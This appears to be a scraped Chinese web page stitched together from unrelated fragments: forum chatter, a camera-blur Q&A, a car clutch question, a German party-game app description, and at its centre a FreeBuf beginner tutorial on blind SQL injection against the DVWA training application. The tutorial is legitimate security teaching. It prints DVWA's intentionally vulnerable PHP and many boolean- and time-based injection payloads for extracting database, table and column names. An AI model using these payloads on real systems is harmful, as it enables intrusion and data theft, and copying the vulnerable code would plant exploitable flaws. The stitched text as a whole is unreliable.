blind melon有没有新手的意思

【某兔的研究生日常】忘了&新手幻觉 | Geek笑点低小组 | 果壳网 科技有意思
1111912人加入此小组
===========分割线==========目录:
+ 加入我的果篮
这么久了没人评论?这个系列很好的说
独眼龙的画风不错..
引用 的话:这么久了没人评论?这个系列很好的说半夜发帖加上实名制风波来自
手机绑定问题,刚刚解决没多久……
我遇到的曾经的同学干的事情:养细胞,加“搭载了抗癌药的介孔颗粒”,细胞全死了,开心的给老师汇报。老师一脸黑线来自
XX是什么东东,染色体吗?
肯定是故意找师姐搭讪的
能一次成功绝对是新手幻觉第一名啊。
新手幻觉No. 0:以为自己会有个漂亮师姐。
XX是什么东东,染色体吗?“某某”的意思
生物物理博士生
11楼广告狗
(C)2017果壳网&&&&京ICP证100430号&&&&京网文[-239号&&&&新出发京零字东150005号&&&&
违法和不良信息举报邮箱:&&&&举报电话:帖子很冷清,卤煮很失落!求安慰
手机签到经验翻倍!快来扫一扫!
p500拍虚化背景要怎么拍呀,新手不懂·求帮助哦·
520浏览 / 6回复
p500拍虚化背景要怎么拍呀,新手不懂·求帮助哦·
要想虚化背景,有如下三种方法:
(1) 将变焦倍率设置成最大;
(2) 背景尽可能设置较远;
(3) 加大光圈。
如果同时使用这三个方法,能够得到更显著的背景虚化效果。
如果相机能够变焦,那么就将变焦倍率设置成最大,即是说以将图像扩大到的最大限度来拍摄就能够最大限度地虚化背景。如果增大变焦倍率后,拍摄主体溢出了画面,那么请摄影者往后退,离拍摄主体再远一些。
另外,利用数码变焦功能是不能达到变焦后的虚化效果的,用户需要有具备光学变焦功能的。
P500完全能做到。
一楼正解,诲人不倦,支持!
哦·这样哦··谢谢哦·
支一楼,善哉。
对 楼主 y 说:=========================一楼正解,第二条也可以理解为增加相机到背景的距离与相机到被摄物体的距离的比例
学习中~~~~
您需要登录后才可以回帖&&&|&&&&&
可能感兴趣的板块:
用户名/注册邮箱/注册手机号
其他第三方号登录查看: 回复:6
您好,精华帖至少要有15张图片,文字不少200个字!并且是原创内容,布局合理。
楼主 电梯直达 楼
汪主任:您好!FOCUS手动三厢3000公里,放离合时脚底有颤动磨擦感.正常吗?请指教!谢谢!!!
申请精华帖
您的申请已经提交,请耐心等待审核
1、审核通常是1-3个工作日
2、审核结果我们会通过系统消息给您答复
申请精华帖
您已经超过申请限制,不可再申请
您的申请连续三次被驳回,已经无法再申请精华帖,谢谢你对我们的支持!如有疑问,可以
申请精华帖
您有发现精华的慧眼,赞一个!
1、我们会在1-3个工作日内完成审核
申请精华帖
此贴已经申请精华中,谢谢您的支持!
1、我们会在1-3个工作日内完成审核
申请精华帖
您好,该帖子经过审核后,发现内容不符合精华要求,无法申请成为精华,谢谢你的支持!
申请精华帖
抱歉,帖子还没达到精华标准
精华帖至少要有15张图片,文字不少于200个字!您的帖子未达到要求,不能申请精华。
路过,等着看回答。
汪主任喝多了楼主慢慢等吧
颤动磨擦感?lz能否说清楚点?
Re:[hywgsy,1楼]以下是引用&hywgsy&在1楼的发言:汪主任:您好!FOCUS手动三厢3000公里,放离合时脚底有颤动磨擦感.正常吗?请指教!谢谢!!!
有轻微此现象是正常的.建议去4S确定一下.不好意思才见到此贴
孩子咳嗽两声别太在意当了爹妈就是操心
什么东东啊
您需要登录后才可以发帖
福克斯更多相关问题
回复成功!积分+2新手指南:DVWA-1.9全级别教程之SQL Injection(Blind)
*本文原创作者:lonehand,转载请注明来自
目前,最新的 DVWA 已经更新到 1.9 版本(
),而网上的教程大多停留在旧版本,且没有针对 DVWA high 级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。
DVWA ( Damn Vulnerable Web Application )是一个用来进行安全脆弱性鉴定的 PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助 web 开发者更好的理解 web 应用安全防范的过程。
DVWA共有十个模块,分别是
Brute Force(暴力(破解))
Command Injection(命令行注入)
CSRF(跨站请求伪造)
File Inclusion(文件包含)
File Upload(文件上传)
Insecure CAPTCHA&(不安全的验证码)
SQL Injection(SQL注入)
SQL Injection(Blind)(SQL盲注)
XSS(Reflected)(反射型跨站脚本)
XSS(Stored)(存储型跨站脚本)
需要注意的是, DVWA 1.9 的代码分为四种安全级别: Low , Medium , High , Impossible 。初学者可以通过比较四种级别的代码,接触到一些 PHP 代码审计的内容。
DVWA 的搭建
Freebuf 上的这篇文章《新手指南:手把手教你如何搭建自己的渗透测试环境》(
)已经写得非常好了,在这里就不赘述了。
之前模块的相关内容
本文介绍SQL Injection ( Blind ) 模块的相关内容,后续教程会在之后的文章中给出。
SQL Injection (Blind)
SQL Injection ( Blind ),即 SQL 盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的 SQL 注入漏洞大多是 SQL 盲注。
手工 盲注 思路
手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答 “是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是 a 啊?”,通过这种机械的询问,最终获得你想要的数据。
盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注,这里由于实验环境的限制,只演示基于布尔的盲注与基于时间的盲注。
下面简要介绍手工盲注的步骤(可与之前的手工注入作比较):
1.判断是否存在注入,注入是字符型还是数字型
2.猜解当前数据库名
3.猜解数据库中的表名
4.猜解表中的字段名
5.猜解数据
下面对四种级别的代码进行分析。
服务器端核心代码
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
= &SELECT first_name, last_name FROM users WHERE user_id = '$id';&;
$result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysql_numrows( $result ); // The '@' character suppresses errors
if( $num & 0 ) {
// Feedback for end user
echo '&pre&User ID exists in the database.&/pre&';
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '&pre&User ID is MISSING from the database.&/pre&';
mysql_close();
可以看到, Low 级别的代码对参数 id 没有做任何检查、过滤,存在明显的 SQL 注入漏洞,同时 SQL 语句查询返回的结果只有两种, ‘
User ID exists in the database.
User ID is MISSING from the database.`
‘ ,因此这里是 SQL 盲注漏洞。
首先演示 基于布尔的盲注 :
1.判断是否存在注入,注入是字符型还是数字型
输入 1 ,显示相应用户存在:
输入1’ and 1=1 #,显示存在:
输入1’ and 1=2 #,显示不存在:
说明存在字符型的SQL盲注。
2.猜解当前数据库名
想要猜解数据库名,首先要猜解数据库名的长度,然后挨个猜解字符。
&and length(database())=1 # ,显示不存在;
&and length(database())=2 # ,显示不存在;
&and length(database())=3 # ,显示不存在;
&and length(database())=4 # ,显示存在:
说明数据库名长度为4。
下面采用二分法猜解数据库名。
输入 1’ and ascii(substr(databse(),1,1))&97 # ,显示存在,说明数据库名的第一个字符的 ascii 值大于 97 (小写字母 a 的 ascii 值);
输入 1’ and ascii(substr(databse(),1,1))&122 # ,显示存在,说明数据库名的第一个字符的 ascii 值小于 122 (小写字母 z 的 ascii 值);
输入 1’ and ascii(substr(databse(),1,1))&109 # ,显示存在,说明数据库名的第一个字符的 ascii 值小于 109 (小写字母 m 的 ascii 值);
输入 1’ and ascii(substr(databse(),1,1))&103 # ,显示存在,说明数据库名的第一个字符的 ascii 值小于 103 (小写字母 g 的 ascii 值);
输入 1’ and ascii(substr(databse(),1,1))&100 # ,显示不存在,说明数据库名的第一个字符的 ascii 值不小于 100 (小写字母 d 的 ascii 值);
输入 1’ and ascii(substr(databse(),1,1))&100 # ,显示不存在,说明数据库名的第一个字符的 ascii 值不大于 100 (小写字母 d 的 ascii 值),所以数据库名的第一个字符的 ascii 值为 100 ,即小写字母 d 。
重复上述步骤,就可以猜解出完整的数据库名( dvwa )了。
3.猜解数据库中的表名
首先猜解数据库中表的数量:
1’ and (select count (table_name) from information_schema.tables where table_schema=database())=1 #显示不存在
1’ and (select count (table_name) from information_schema.tables where table_schema=database() )=2 #显示存在
说明数据库中共有两个表。
接着挨个猜解表名:
1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #显示不存在
1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 #显示不存在
1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #显示存在
说明第一个表名长度为 9 。
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&97 # 显示存在
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&122 # 显示存在
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&109 # 显示存在
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&103 # 显示不存在
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&103 # 显示不存在
说明第一个表的名字的第一个字符为小写字母g。
重复上述步骤,即可猜解出两个表名(guestbook、users)。
4.猜解表中的字段名
首先猜解表中字段的数量:
1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=1 # 显示不存在
1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=8 # 显示存在
说明users表有8个字段。
接着挨个猜解字段名:
1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1 # 显示不存在
1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7 # 显示存在
说明users表的第一个字段为7个字符长度。
采用二分法,即可猜解出所有字段名。
5.猜解数据
同样采用二分法。
还可以使用 基于时间的盲注 :
1.判断是否存在注入,注入是字符型还是数字型
输入1’ and sleep(5) #,感觉到明显延迟;
输入1 and sleep(5) #,没有延迟;
说明存在字符型的基于时间的盲注。
2.猜解当前数据库名
首先猜解数据名的长度:
1’ and if(length(database())=1,sleep(5),1) # 没有延迟
1’ and if(length(database())=2,sleep(5),1) # 没有延迟
1’ and if(length(database())=3,sleep(5),1) # 没有延迟
1’ and if(length(database())=4,sleep(5),1) # 明显延迟
说明数据库名长度为4个字符。
接着采用二分法猜解数据库名:
1’ and if(ascii(substr(database(),1,1))&97,sleep(5),1)# 明显延迟
1’ and if(ascii(substr(database(),1,1))&100,sleep(5),1)# 没有延迟
1’ and if(ascii(substr(database(),1,1))&100,sleep(5),1)# 没有延迟
说明数据库名的第一个字符为小写字母d。
重复上述步骤,即可猜解出数据库名。
3.猜解数据库中的表名
首先猜解数据库中表的数量:
1’ and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 没有延迟
1’ and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# 明显延迟
说明数据库中有两个表。
接着挨个猜解表名:
1’ and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # 没有延迟
1’ and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # 明显延迟
说明第一个表名的长度为9个字符。
采用二分法即可猜解出表名。
4.猜解表中的字段名
首先猜解表中字段的数量:
1’ and if((select count(column_name) from information_schema.columns where table_name= ’users’)=1,sleep(5),1)# 没有延迟
1’ and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)# 明显延迟
说明users表中有8个字段。
接着挨个猜解字段名:
1’ and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1,sleep(5),1) # 没有延迟
1’ and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1) # 明显延迟
说明users表的第一个字段长度为7个字符。
采用二分法即可猜解出各个字段名。
5.猜解数据
同样采用二分法。
服务器端核心代码
if( isset( $_POST[ 'Submit' ]
// Get input
$id = $_POST[ 'id' ];
$id = mysql_real_escape_string( $id );
// Check database
= &SELECT first_name, last_name FROM users WHERE user_id = $&;
$result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysql_numrows( $result ); // The '@' character suppresses errors
if( $num & 0 ) {
// Feedback for end user
echo '&pre&User ID exists in the database.&/pre&';
// Feedback for end user
echo '&pre&User ID is MISSING from the database.&/pre&';
//mysql_close();
可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号
\x00,\n,\r,\,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。
虽然前端使用了下拉选择菜单,但我们依然可以通过抓包改参数id,提交恶意构造的查询参数。
之前已经介绍了详细的盲注流程,这里就简要演示几个。
首先是 基于布尔的盲注 :
抓包改参数id为1 and length(database())=4 #,显示存在,说明数据库名的长度为4个字符;
抓包改参数id为1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #,显示存在,说明数据中的第一个表名长度为9个字符;
抓包改参数id为1 and (select count(column_name) from information_schema.columns where table_name= 0&)=8 #,(0&为users的16进制),显示存在,说明uers表有8个字段。
然后是 基于时间的盲注 :
抓包改参数id为1 and if(length(database())=4,sleep(5),1) #,明显延迟,说明数据库名的长度为4个字符;
抓包改参数id为1 and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #,明显延迟,说明数据中的第一个表名长度为9个字符;
抓包改参数id为1 and if((select count(column_name) from information_schema.columns where table_name=0& )=8,sleep(5),1) #,明显延迟,说明uers表有8个字段。
服务器端核心代码
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
= &SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;&;
$result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysql_numrows( $result ); // The '@' character suppresses errors
if( $num & 0 ) {
// Feedback for end user
echo '&pre&User ID exists in the database.&/pre&';
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '&pre&User ID is MISSING from the database.&/pre&';
mysql_close();
可以看到,High级别的代码利用cookie传递参数id,当SQL查询结果为空时,会执行函数sleep(seconds),目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。
虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。但由于服务器端执行sleep函数,会使得基于时间盲注的准确性受到影响,这里我们只演示 基于布尔的盲注 :
抓包将cookie中参数id改为1’ and length(database())=4 #,显示存在,说明数据库名的长度为4个字符;
抓包将cookie中参数id改为1’ and length(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #,显示存在,说明数据中的第一个表名长度为9个字符;
抓包将cookie中参数id改为1’ and (select count(column_name) from information_schema.columns where table_name=0&)=8 #,(0& 为users的16进制),显示存在,说明uers表有8个字段。
Impossible
服务器端核心代码
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db-&prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data-&bindParam( ':id', $id, PDO::PARAM_INT );
$data-&execute();
// Get results
if( $data-&rowCount() == 1 ) {
// Feedback for end user
echo '&pre&User ID exists in the database.&/pre&';
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '&pre&User ID is MISSING from the database.&/pre&';
// Generate Anti-CSRF token
generateSessionToken();
可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。
*本文原创作者:lonehand,转载请注明来自手机游戏&&尽在九游
Dieses Spiel ist die die digitale A
Dieses Spiel ist die die digitale Abbildung eines Party-Krachers, den wir früher oft gespielt haben: Jeder in der Runde bekommt einen Zettel und einen Stift und schreibt jeweils einen Satz einer Geschichte. Durch vorgegebene Satzfragmente gibt es ein gewisses Handlungsmuster, sodass jeder weiss, was er schreiben muss. Was aber wirklich passiert, entscheiden die Spieler selbst - je kreativer, desto lustiger. Sobald ein Satz geschrieben wurde, knickt man den Zettel um und gibt ihn an seinen Nachbarn weiter. Weil niemand weiss, was der Vorg?nger geschrieben hat, kommt es immer zu sehr skurrilen Konstellationen. Lasst euch überraschen.Die vorgegebene Geschichte handelt vom Treffen eines noch unbekannten Mannes und einer Frau - daher der Name "Blind Date".Früher haben wir das mit Zettel und Stift gespielt, aber hey: wir haben 2012. Wir haben iPhones und iPads, die wir bei jedem Kneipenbesuch sofort zur Hand haben. Da wird euch dieses Spiel viel Freude bereiten. Versprochen!Viel Spass!
开发者:互联网
Blind-Date
点击下载按钮,或通过扫描二维码直接下载!
请用手机扫描二维码订阅~
订阅后可及时接受活动,礼包,开测和开放下载的提醒!}

我要回帖

更多关于 the blind side 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信